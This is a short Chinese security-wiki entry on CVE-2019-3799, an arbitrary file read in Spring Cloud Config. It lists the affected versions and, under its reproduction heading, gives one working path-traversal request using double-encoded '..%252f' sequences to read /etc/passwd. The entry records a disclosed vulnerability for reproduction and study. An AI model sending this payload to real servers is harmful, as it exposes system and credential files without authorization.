(CVE-2019-3799)任意文件读取

一、漏洞简介

二、漏洞影响

Spring Cloud Config 2.1.0 to 2.1.1

Spring Cloud Config 2.0.0 to 2.0.3

Spring Cloud Config 1.4.0 to 1.4.5

其他不受支持的老版本 (如Spring Cloud Config1.3及其以下版本)

三、复现过程

/test/pathtraversal/master/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-03 23:28:26

results matching ""

    No results matching ""